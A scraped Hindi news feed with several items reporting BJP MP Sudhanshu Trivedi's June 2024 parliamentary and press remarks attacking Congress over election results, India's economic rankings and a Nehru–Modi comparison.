कांग्रेस और विपक्षी दलों की आलोचना करते हुए भाजपा के राष्ट्रीय प्रवक्ता ने आगे कहा कि खुशी और गर्व के मौके पर भी विपक्ष नकारात्मकता फैलाने पर तुला हुआ है। कोई भी शुभ अवसर हो, वे नकारात्मक और शर्मनाक टिप्पणियां करना शुरू कर देते हैं। अब, वे हमसे 'यूक्रेन' के बारे में पूछ रहे हैं। मैं कांग्रेस पार्टी से पूछना चाहता हूं कि क्या उन्होंने अपनी सीडब्ल्यूसी में रूस-यूक्रेन मुद्दे पर कोई प्रस्ताव पारित किया है?

उन्होंने दुनियाभर में पीएम मोदी की लोकप्रियता और प्रभाव का जिक्र करते हुए कहा कि अमेरिका कहता है कि 'भारत हमारा रणनीतिक साझेदार है' और रूस कहता है, 'भारत हमारा पारंपरिक सहयोगी है।' उन्होंने कहा कि पूरी दुनिया में किसी अन्य देश का इतना बड़ा कद नहीं है, जिसके प्रति इन दोनों देशों ने इन शब्दों में अपनी भावना व्यक्त की हो। इस समय भारत के पीएम नरेंद्र मोदी एकमात्र ऐसे राष्ट्राध्यक्ष हैं, जिन्हें दो बार अमेरिकी संसद के संयुक्त सत्र को संबोधित करने का अवसर मिला और उसके साथ ही रूस ने भी उन्हें अपना सर्वोच्च नागरिक सम्मान दिया है।

जनसंख्या को लेकर पूछे गए सवाल के जवाब में उन्होंने असम की घुबरी लोकसभा सीट पर आए नतीजे का हवाला देते हुए कहा कि ये देखना होगा कि डेमोग्राफी कैसे बदल रही है और जनसंख्या वृद्धि एवं असंतुलन का फायदा कौन उठा रहा है। महंगाई को लेकर पूछे गए एक सवाल के जवाब में उन्होंने कांग्रेस के दौर की याद दिलाते हुए कहा कि लोगों को यह देखना चाहिए कि कांग्रेस के कार्यकाल में महंगाई की दर कितनी ज्यादा थी।

]]>
जिस ब्रिटेन ने हम पर हुकूमत की, मोदी राज में हमने उसे पीछे छोड़ा : सुधांशु त्रिवेदी https://pratyushaashakinayikiran.com/?p=46235 Sat, 29 Jun 2024 09:36:00 +0000 https://pratyushaashakinayikiran.com/?p=46235 नई दिल्ली
 राष्ट्रपति के अभिभाषण पर धन्यवाद प्रस्ताव पेश करते हुए राज्यसभा में भाजपा सांसद सुधांशु त्रिवेदी ने कहा कि हमारे गठबंधन ने और भारतीय जनता पार्टी ने दक्षिण भारत में कांग्रेस से अधिक मत हासिल किए हैं। तेलंगाना में हमारी 8 सीटें ही नहीं हैं, बल्कि 35 प्रतिशत वोट हासिल किए हैं। कर्नाटक में बीजेपी को 45 प्रतिशत वोट मिले हैं। केरल में हमारी एक सीट आई है और 17 प्रतिशत वोट मिले हैं। तमिलनाडु में कांग्रेस पार्टी को 10.25 प्रतिशत वोट मिले जबकि भाजपा को यहां 11.5 फीसदी वोट मिले हैं।

उन्होंने यह भी कहा कि उड़ीसा में पहली बार भाजपा ने सरकार बनाई है। सुधांशु त्रिवेदी ने कहा कि हम पांचवीं बड़ी अर्थव्यवस्था बने हैं, लेकिन हम सिर्फ पांचवीं बड़ी अर्थव्यवस्था नहीं बने, पांचवीं बड़ी अर्थव्यवस्था उस ब्रिटेन को पीछे छोड़कर बने जिसने हमारे ऊपर हुकूमत की। हम दुनिया के चौथे सबसे बड़े स्टॉक एक्सचेंज बने। हम दुनिया के तीसरे बड़े सोलर एनर्जी के केंद्र बने। हम दुनिया के तीसरे सबसे बड़े ऑटोमोबाइल मैन्युफैक्चरर बने।

उन्होंने कहा, भारत में डोमेस्टिक एविएशन सेक्टर विश्व में तीसरे नंबर का हो गया है। मोबाइल हैंडसेट बनाने में हम दुनिया में दूसरे नंबर पर हैं। डिजिटल पेमेंट में हम दुनिया में नंबर वन हैं। पिछली लोकसभा और इस लोकसभा के बीच में चांद के अछूते कोने दक्षिणी ध्रुव को छूने वाले हम दुनिया के पहले देश बने। निश्चित रूप से उसमें हमारे वैज्ञानिकों ने बड़ी भूमिका निभाई, लेकिन हमारे प्रधानमंत्री का निरंतर रूप से उसमें सहयोग उन्हें प्राप्त होता रहा। प्रधानमंत्री ने उस पॉइंट का नाम रखा शिव शक्ति।

सुधांशु त्रिवेदी ने कहा कि कुछ राजनीतिक दल ऐसे हैं जो कहते हैं कि हिंदू धर्म में जो शक्ति है उससे हमें लड़ना है। दूसरी तरफ हमारा संकल्प यह है कि उस शक्ति को चांद की ऊंचाई तक ले जाकर स्थापित करना है। यह चुनाव एक मामले में देश के अद्भुत चुनाव थे। चुनाव परिणाम के दिन एक पार्टी के कार्यालय में धूम धड़ाका होता है, मिठाई बांटी जाती है, वहीं दूसरी पार्टी के दफ्तर में सन्नाटा होता है। लेकिन यह चुनाव ऐसे थे कि भाजपा कार्यालय में भी और कांग्रेस कार्यालय में भी मिठाई बंट रही थी। हमें तो स्पष्ट बहुमत मिला, लगातार तीसरी बार सरकार बनाई।

उन्होंने कहा कि जो तीन चुनाव के बाद भी तीन डिजिट की संख्या प्राप्त नहीं कर पाए, चुनाव के बाद उनके चेहरे की चमक देखिए। उनकी आवाज की खनक देखिए। उनके जलवे में धमक देखिए। ऐसा लगता है कि मानो बहुत बड़ी उपलब्धि हासिल कर ली। इसका कारण यह है महोदय कि एक बच्चा होता है जो टॉपर होता है, अगर वह डिस्टिंक्शन के बदले फर्स्ट डिवीजन लाए तो उसके चेहरे पर वह खुशी नहीं होती है। वहीं फेल होने वाला बच्चा अगर ग्रेस अंक लाकर थर्ड डिवीजन पास हो जाए तो उसे बड़ी खुशी होती है।

उन्होंने कहा कि 1984 के बाद से आज तक बीते 40 साल में कभी कांग्रेस को 240 सीटें नहीं मिली। उन्होंने कहा कि मैं प्रधानमंत्री जी की तरफ से उनके लिए एक बात कहना चाहूंगा — 'दरिया का सारा नशा उतरता चला गया, वह मुझे डुबाता रहा और मैं उभरता चला गया। और यह 44, 52, 99 अरे जिसे मंजिल समझ कर बैठ गए चंद लोग, मैं ऐसे कितने ही रास्तों से गुजरा चला गया'।

 

]]>
सुधांशु त्रिवेदी कहा – कांग्रेस तीन चुनाव के बाद भी तीन अंकों में नहीं पहुंच पाई, फिर भी इतनी खुश है, इसके पीछे उनकी मानसिकता है https://pratyushaashakinayikiran.com/?p=45969 Fri, 28 Jun 2024 14:21:00 +0000 https://pratyushaashakinayikiran.com/?p=45969 नई दिल्ली

संसद के दोनों सदनों में शुक्रवार को नीट-यूजी परीक्षा में पेपर लीक के आरोपों समेत कई मामलों पर जोरदार हंगामा जारी रहा। लोकसभा की कार्यवाही दोपहर 12 बजे ही सोमवार तक के लिए स्थगित हो गई। हालांकि राज्यसभा में  दिलचस्प बहस भी हुई। सुधांशु त्रिवेदी ने चुनाव नतीजों का जिक्र करते हुए विपक्ष को जमकर सुनाया। उन्होंने कहा कि कांग्रेस तीन चुनाव के बाद भी तीन अंकों में नहीं पहुंच पाई। फिर भी इतनी खुश है। इसके पीछे वह मानसिकता है, जिसमें फेल होने वाला बच्चा यदि थर्ड डिविजन से भी पास हो जाए तो बहुत खुश होता है।

सुधांशु त्रिवेदी ने कहा, 'तीसरी बार में भी तीन डिजिट में न आ पााने वाले लोग आखिर क्यों पटाखे दाग रहे थे। इसकी वजह यह थी कि लगातार फेल होने वाला बच्चा यदि ग्रेस मार्क्स से पास हो जाए तो बहुत खुशी होती है। वहीं हमेशा डिस्टिंक्शन पाने वाले को यदि फर्स्ट डिविजन मिले, तब भी वह दुखी होता है।' उन्होंने एक किस्सा सुनाते हुए कहा कि पहले के दौर में डिविजन पता चलती थी और रिजल्ट में उसे रोमन नंबर में लिखा जाता था। मेरे मोहल्ले में एक बार एक बच्चा फर्स्ट डिविजन से पास हुआ और दूसरा थर्ड से। फर्स्ट डिविजन से पास होने वाला दुखी था क्योंकि उसे मेरिट की उम्मीद थी। वहीं थर्ड डिविजन वाला बहुत खुश था। उससे लोगों ने पूछा कि ऐसा क्या है कि खुश हो। इस पर थर्ड डिविजन वाले ने कहा कि मेरा भी डिविजन फर्स्ट है और उसके साथ दो बॉडीगार्ड भी मिले हैं।

भाजपा सांसद ने कहा कि बीते 40 सालों से कांग्रेस को 240 सीटें नहीं मिल पाई हैं। सिर्फ नरसिम्हा राव जी को 232 सीटें चुनाव में मिली थीं। उनके अलावा किसी भी नेता को 1984 के बाद से अब तक इतना बहुमत नहीं मिला था। उन्होंने मोदी सरकार के तीसरी बार सत्ता में आने और विपक्ष के फिर चूक जाने को लेकर शायर वसीम बरेलवी की गजल की कुछ लाइनें भी पढ़ीं। सुधांशु त्रिवेदी ने कहा-

दरिया का सारा नशा उतरता चला गया,
वह डुबाता रहा और मैं उभरता चला गया।
मंज़िल समझ के बैठ गए जिनको चंद लोग,
मैं ऐसे रास्तों से गुज़रता चला गया।

इसके अलावा नेहरू और पीएम नरेंद्र मोदी की तुलना पर भी जवाब दिया। त्रिवेदी ने कहा कि नेहरू और मोदी की तुलना नहीं हो सकती। उनको लेकर जब चुनाव हुआ तो कुछ वोट पट्टाभि सीतारमैया समेत कई लोगों को मिले, लेकिन बाकी सारे वोट सरदार पटेल को मिले थे। नेहरू को तो एक भी वोट नहीं मिला और पीएम मोदी सर्वसम्मति से पीएम बने हैं। इसलिए दोनों के बीच कोई तुलना नहीं हो सकती। मजरूह सुल्तानपुरी ने नेहरू को हिटलर बताते हुए एक आर्टिकल लिख दिया था तो उन पर दो साल के लिए पाबंदी लग गई थी। लेकिन आज पीएम मोदी के टुकड़े-टुकड़े करने की बात कहने वाले भी सांसद बनकर आए हैं।

 

]]>